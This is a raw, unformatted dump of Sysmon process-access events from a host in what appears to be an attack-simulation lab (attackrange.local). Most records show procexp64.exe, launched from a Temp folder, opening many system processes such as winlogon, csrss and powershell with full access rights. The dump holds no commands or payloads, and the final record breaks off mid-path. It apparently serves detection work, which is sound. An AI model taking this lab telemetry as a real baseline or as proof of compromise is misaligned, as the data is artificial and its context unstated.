15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788541Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788540Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788539Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788538Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788537Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788536Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788638Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788637Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788636Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788635Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788634Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788633Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788632Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788631Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788700Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788699Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788698Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788697Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788696Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788695Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788694Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788693Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788692Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788691Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788690Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788689Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788688Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788687Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788686Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788685Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788684Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788683Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788682Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788681Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788680Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788679Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program 